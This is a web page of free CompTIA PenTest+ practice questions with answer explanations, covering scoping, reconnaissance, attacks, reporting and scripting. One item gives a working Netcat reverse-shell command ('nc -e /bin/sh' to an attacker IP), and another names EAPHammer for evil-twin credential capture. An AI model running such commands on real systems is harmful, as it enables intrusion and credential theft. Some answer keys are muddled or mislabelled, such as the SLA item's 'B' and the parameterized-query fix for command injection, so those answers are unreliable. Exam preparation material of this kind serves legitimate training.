CompTIA PenTest+ Practice Test (PT0-002)
Use the form below to configure your CompTIA PenTest+ Practice Test (PT0-002). The practice test can be configured to only include certain exam objectives and domains. You can choose between 5-100 questions and set a time limit.

CompTIA PenTest+ PT0-002 Information
CompTIA PenTest+ (PT0-002) Exam
The CompTIA PenTest+ (PT0-002) certification is designed for cybersecurity professionals who specialize in penetration testing and vulnerability assessment. It validates hands-on skills in planning, conducting, and reporting penetration tests for organizations. This certification is vendor-neutral and focuses on real-world scenarios, making it relevant for security professionals working with various technologies and environments.
Exam Overview
The PT0-002 exam consists of a maximum of 85 questions, including multiple-choice and performance-based questions. Candidates have 165 minutes to complete the test. The exam costs $392 USD. A passing score is 750 on a scale of 100 to 900. The certification is valid for three years and can be renewed through CompTIA’s continuing education program.
Exam Content
The PT0-002 exam covers five main domains: planning and scoping, information gathering and vulnerability scanning, attacks and exploits, reporting and communication, and tools and code analysis. Planning and scoping include engagement rules, compliance, and risk assessment. Information gathering and vulnerability scanning focus on reconnaissance, fingerprinting, and scanning techniques. Attacks and exploits test knowledge of network, web, wireless, and physical attacks. Reporting and communication cover documentation, remediation, and risk communication. Tools and code analysis assess scripting, automation, and exploit development.
Who Should Take This Exam?
The CompTIA PenTest+ certification is ideal for cybersecurity professionals working as penetration testers, security analysts, vulnerability assessment analysts, or red team members. It is recommended for individuals with at least three to four years of hands-on cybersecurity experience. The certification is also useful for IT professionals who want to advance their careers in offensive security.
How to Prepare
Candidates should review the official CompTIA PenTest+ Exam Objectives and study materials provided by CompTIA. Practical experience with penetration testing tools such as Metasploit, Nmap, and Burp Suite is essential. Practice exams can help assess readiness and identify weak areas. Hands-on labs and ethical hacking courses can further strengthen skills.
Summary
The CompTIA PenTest+ (PT0-002) certification is a valuable credential for cybersecurity professionals specializing in penetration testing and vulnerability assessment. It validates hands-on skills in ethical hacking, exploit development, and security testing. This certification is ideal for those pursuing careers in offensive security and ethical hacking.
Scroll down to see your responses and detailed results
Free CompTIA PenTest+ PT0-002 Practice Test
Press start when you are ready, or press Change to modify any settings for the practice test.
- Questions: 15
- Time: Unlimited
- Included Topics:Planning and ScopingInformation Gathering and Vulnerability ScanningAttacks and ExploitsReporting and CommunicationTools and Code Analysis
As a penetration tester, you have been tasked to assess the security of a company's wireless infrastructure. You decide to simulate an evil twin attack to test the network's resilience to credential theft. Which tool would you use to create a rogue access point that replicates the company's WPA2-Enterprise network in order to capture employee credentials?
- You selected this option
Implement Kismet for network detection and packet sniffing on the target wireless network.
- You selected this option
Use EAPHammer to create the rogue access point and facilitate the attack to capture credentials.
- You selected this option
Deploy mdk4 to conduct a denial-of-service attack on the network, effectively disrupting the wireless services.
- You selected this option
Utilize Aircrack-ng to crack the WPA2 password and gain unauthorized access to sensitive information.
Answer Description
EAPHammer is specifically designed for such a scenario, where it can be used to create a rogue access point that mimics the legitimate WPA2-Enterprise network. It can then capture credentials as employees unwittingly connect to this malicious access point, thinking it is the corporate network. The incorrect answers, while related to Wi-Fi security, do not provide the functionality to mimic WPA2-Enterprise networks for the purpose of capturing credentials through such an attack.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is an evil twin attack?
How does EAPHammer work?
What are the risks of using EAPHammer or similar tools?
During a penetration test, you are tasked with automating the extraction of form field names from a collection of HTML files. Which programming language would be most efficient to employ for writing a script to perform this operation, considering its powerful libraries for parsing HTML and XML?
- You selected this option
JavaScript
- You selected this option
Python
- You selected this option
Perl
- You selected this option
Ruby
Answer Description
Python is the correct answer because it has powerful libraries such as Beautiful Soup and lxml, which are specifically designed for parsing and interacting with HTML and XML documents. These libraries make it easy to navigate the document tree and retrieve the information needed, such as form field names. Perl, while powerful in text manipulation, does not have as streamlined libraries for parsing HTML as Python. Ruby and JavaScript can also be used for parsing HTML, but Python's libraries and widespread usage for such tasks generally make it a more efficient choice in scenarios involving HTML parsing in penetration testing.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What are Beautiful Soup and lxml?
Why is Python preferred for automation in penetration testing?
What are some other libraries in Python that can help with penetration testing?
During an active reconnaissance phase, a penetration tester is using a tool to gather information about valid usernames on a target system. Which of the following activities best describes this process?
- You selected this option
DNS lookup
- You selected this option
User enumeration
- You selected this option
OS fingerprinting
- You selected this option
Packet crafting
Answer Description
Enumeration involves the discovery of hosts, services, domains, users, and other resources on a network. Identifying valid usernames falls directly under the category of user enumeration, which is a specific type of enumeration activity aimed at gathering user-related information from a target system. This information can be important for subsequent phases of a penetration test, including crafting user-specific attacks or social engineering efforts.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What tools are commonly used for user enumeration in penetration testing?
What are some common techniques to carry out user enumeration?
Why is it important to gather valid usernames during a penetration test?
What type of control is implemented when using a fingerprint scanner to restrict access to a secure data center?
- You selected this option
Time-of-day restriction
- You selected this option
Mandatory vacation
- You selected this option
Biometric control
- You selected this option
Encryption control
- You selected this option
Network segmentation
- You selected this option
Role-based access control
Answer Description
A fingerprint scanner is a type of biometric control because it uses unique biological characteristics of an individual, in this case their fingerprint, to authenticate and authorize access. It relies on physical traits, which are difficult to forge or duplicate, thus providing a strong linkage between the individual and the access control system.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What are biometric controls and how do they work?
What makes biometric authentication more secure than traditional methods?
Are there any limitations or challenges related to biometric controls?
Which data structure is non-linear and consists of nodes connected by edges, where nodes may have zero or more child nodes, typically used to represent hierarchical information?
- You selected this option
Graph
- You selected this option
List
- You selected this option
Tree
- You selected this option
Stack
Answer Description
A tree is a non-linear data structure that consists of nodes connected by edges. Each node in a tree can have zero or more child nodes, and it is a way to represent hierarchical structures such as directory structures or organizational structures. Binary trees are a special case with a maximum of two children, but 'tree' generally refers to any hierarchical node structure with any number of children, hence making it the correct answer. A graph can be cyclic and doesn't necessarily follow a hierarchical structure. A list and a stack are linear data structures, which differ significantly from the non-linear, hierarchical nature of trees.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What are the key characteristics of a tree data structure?
What is the difference between a tree and a graph in data structures?
How are trees utilized in computer science and programming?
When tasked with establishing a reverse shell on a target machine, which command using the discussed tool best fits the scenario?
- You selected this option
nc -v 192.168.1.10 4444
- You selected this option
nc -e /bin/sh 192.168.1.10 4444
- You selected this option
nc -lp 4444 -e /bin/sh
- You selected this option
nc -lvp 4444
Answer Description
Using the command nc -lvp 4444 would set up the listening post incorrectly, as this command is used on the attacker's machine, not the target. The nc -e /bin/sh 192.168.1.10 4444 would be the correct usage of Netcat on the target machine to execute a reverse shell, assuming that the IP address and port match that of the listening attacker's machine.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What does 'reverse shell' mean in cybersecurity?
What exactly is Netcat and how does it work?
What is the significance of using the '-e' option in Netcat?
After completing a successful penetration testing engagement, you are required to perform data destruction to ensure no residual data from the test remains on the client's systems or your own equipment. Which of the following methods is the most appropriate for securely eradicating files containing sensitive information collected during the testing?
- You selected this option
Delete the files and then empty the recycle bin or trash folder on all devices used.
- You selected this option
Use an approved overwrite utility to perform a secure wipe of storage devices.
- You selected this option
Format the drives on which sensitive data is stored.
- You selected this option
Encrypt the data on the drives without overwriting the original files.
Answer Description
Securely wiping the storage device using an approved overwrite utility ensures that the data is overwritten with random data, making it extremely difficult, if not impossible, to recover the original data. Simple deletion or formatting of a drive does not erase the data; it only removes pointers to the data in the file system, which can easily be recovered using file recovery software. The encryption of existing data without overwriting it does not prevent recovery of the original data because the raw data still exists unaltered on the storage medium.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is an approved overwrite utility?
Why can't simply deleting files or formatting drives ensure complete data destruction?
What are the risks of not securely eradicating sensitive information after a penetration test?
You are preparing for a penetration test within a European Union country that has strict privacy laws. Due to the nature of the test, you need to use packet sniffing tools to analyze network traffic. Which of the following actions is most appropriate according to tool restriction considerations?
- You selected this option
Exclude the use of packet sniffing tools from the penetration test to avoid any conflict with the local privacy laws.
- You selected this option
Use packet sniffing tools only during off-hours to minimize the impact on the client’s network and reduce the risk of violating privacy laws.
- You selected this option
Request written authorization from the client specifically allowing the use of packet sniffing tools during the penetration test.
- You selected this option
Proceed with using packet sniffing tools without client notification, since you are conducting a penetration test to enhance security.
Answer Description
Requesting written authorization from the client for using specific tools, like packet sniffers, is essential, especially where privacy laws are stringent, such as in the European Union under the GDPR. This written authorization helps ensure that you have explicit permission to use techniques that may intercept or process personal data and protects both you and the client from legal repercussions. The other options do not offer the same level of legal protection or adherence to privacy laws, and using tools without consideration of local laws or client permission can lead to serious legal consequences.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is GDPR and why is it important in penetration testing?
What are packet sniffing tools and how are they used in penetration testing?
What are the potential legal consequences of not having authorization for using packet sniffing tools?
During an engagement, a penetration tester needs to organize network host addresses along with an associated list of services running on specific ports for each host. Which data structure is MOST efficient for mapping this type of related information?
- You selected this option
Trees with host addresses as root nodes and services as their subsequent branches
- You selected this option
Sequential arrays where each pair of host addresses and service lists are stored one after the other
- You selected this option
Dictionaries with host addresses as keys paired with value lists detailing services
- You selected this option
Lists in which host addresses and their corresponding service details are added in order
Answer Description
A dictionary (also known as an associative array or hash map) is the most suitable data structure for mapping related information. It allows for pairing network host addresses (as unique keys) with a list of services (as values associated with each key), which provides quick and direct access to the services based on the host address. Contrarily, an array or a list stores elements sequentially and lacks the direct association features, making them less efficient for quickly accessing related elements. A tree organizes data hierarchically and isn't structured to efficiently handle mapping pairs of related information like network host addresses and services.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is a dictionary in programming?
Can you explain why sequential arrays are less efficient for this case?
What are the limitations of using trees for mapping host addresses and services?
During a passive reconnaissance phase, a penetration tester is gathering information on a target organization. They want to determine the technology stack used by the company as well as potential vulnerabilities associated with it. Which of the following techniques would BEST aid in achieving this objective?
- You selected this option
Identifying cryptographic flaws in the organization's SSL certificates to deduce the technology stack.
- You selected this option
Reviewing job listings from the company to discover the technology stack mentioned within them.
- You selected this option
Performing DNS lookups to determine the company's domain name system structure.
- You selected this option
Analyzing website archives and cached content for historical changes to the company's web presence.
Answer Description
Reviewing job listings from the company can reveal the technology stack used by an organization, including software, hardware, and security practices, which is crucial for identifying potential vulnerabilities. Job listings often mention the specific skills, technologies, and platforms for which they are hiring, thus inadvertently providing insights into the company's internal technology environment. DNS lookups can provide information about subdomains and IP addresses but are less likely to provide specifics about the technology stack. Analyzing website archives can reveal historical data but does not necessarily disclose current technologies in use or specific security vulnerabilities. Identifying cryptographic flaws is important, but does not directly indicate the overall technology stack the company utilizes.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is a technology stack?
How can job listings provide insights into a company's technology stack?
What is passive reconnaissance and why is it important?
During a penetration testing engagement, your team has identified an application that is vulnerable to command injection due to insufficient input validation. In your final report, what is the most appropriate process-level remediation recommendation to address this specific vulnerability?
- You selected this option
Advise the client to update their application frameworks to the latest versions to avoid command injection.
- You selected this option
Suggest increasing the complexity of input validation rules within the application code.
- You selected this option
Recommend the implementation of proper input sanitization and the use of prepared statements or parameterized queries.
- You selected this option
Instruct the client to configure the existing Web Application Firewall (WAF) to block command injection attacks.
Answer Description
Input sanitization and the use of prepared statements or parameterized queries are the most effective process-level remediation strategies for preventing command injection vulnerabilities. This is because they both work to ensure that any command or query executed by the application treats user input as data rather than executable code, thus preventing attackers from interfering with the commands or queries the application runs. Although updating application frameworks and verifying the use of a WAF can provide additional security benefits, they are not direct mitigation strategies for command injection at the process level.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is input sanitization and why is it important in preventing command injection?
What are prepared statements and how do they help in preventing command injection?
What are parameterized queries and how do they differ from regular queries?
While conducting a penetration test, you find that a critical application used by the target organization is susceptible to a recently discovered vulnerability. You need to find a proof-of-concept exploit to test the system's defenses against this vulnerability. Which of the following resources is most appropriate for locating the specific exploit code?
- You selected this option
Vendor's security bulletin
- You selected this option
Packet Storm
- You selected this option
Official CVE website
- You selected this option
Common Vulnerability Scoring System (CVSS) database
Answer Description
The correct answer is Packet Storm. It is a widely recognized source for tracking the latest vulnerabilities, exploits, and security information and offers a comprehensive database which penetration testers can use to find specific exploit code for known vulnerabilities. The incorrect answers, although they might offer security information or vulnerability databases, are not as specialized as Packet Storm for the purpose of finding specific exploit codes.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is Packet Storm and how does it work?
What is a proof-of-concept exploit?
What other resources can I use to find vulnerabilities?
You are preparing to conduct a penetration test for a new client. The client's legal team has forwarded you a document that outlines the objectives, deliverables, timelines, and tasks associated with the engagement. Which document are you most likely reviewing to understand these details before beginning the penetration test?
- You selected this option
Service-level agreement (SLA)
- You selected this option
Master service agreement (MSA)
- You selected this option
Statement of work (SOW)
- You selected this option
Non-disclosure agreement (NDA)
Answer Description
The statement of work (SOW) is a formal document that captures and defines the work activities, deliverables, and timeline a vendor must execute in performance of specified work for a client. The other options, such as a Non-disclosure agreement and Service-level agreement, are important legal documents, but they do not typically detail the specifics of the tasks and objectives of a penetration test.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What exactly is a Statement of Work (SOW)?
What are the roles of a Non-disclosure Agreement (NDA) and Service-level Agreement (SLA)?
What might you find in the deliverables section of a SOW for a penetration test?
Tokens issued by a server during a session can be scoped strictly enough to prevent interception and reuse by an unauthorized party.
- You selected this option
False
- You selected this option
True
Answer Description
Tokens, also known as session tokens, are susceptible to different types of attacks if not secured properly. Although tokens can be scoped, if token handling mechanisms are not implemented with strong security controls, such as proper encryption and validation measures, they can still be intercepted and misused by attackers. The correct answer reflects the understanding that without adequate security controls, even well-scoped tokens can be vulnerable to interception and unauthorized reuse.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What are the types of attacks that can target session tokens?
What security controls can be implemented to protect session tokens?
What is meant by 'scoping' a session token?
When performing a penetration test for an organization, what aspect of the SLA would BEST ensure that the expectations for the performance of the security testing are clearly defined and understood by both the service provider and the client?
- You selected this option
Stating the required qualifications of the penetration testers
- You selected this option
Documenting the legal ramifications of a data breach
- You selected this option
Detailing the financial penalties for non-performance
- You selected this option
Providing an inventory of tools to be used in testing
- You selected this option
Outlining the security frameworks to learn for compliance
- You selected this option
Setting clear metrics for service delivery
Answer Description
The correct answer is B: 'Setting clear metrics for service delivery'. SLAs should contain clear metrics for the expected service delivery, which in the context of a penetration test would include the methodologies to be used, the timeline for the delivery of results, and any other pertinent details that define what the client should expect from the service. Specific performance metrics make the agreement actionable and measurable, preventing misunderstandings and future disputes.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What are Service Level Agreements (SLAs) and why are they important in penetration testing?
What kind of metrics can be included in a penetration testing SLA?
What are some common misunderstandings that can arise without clear SLA metrics in penetration testing?
Wow!
Looks like that's it! You can go back and review your answers or click the button below to grade your test.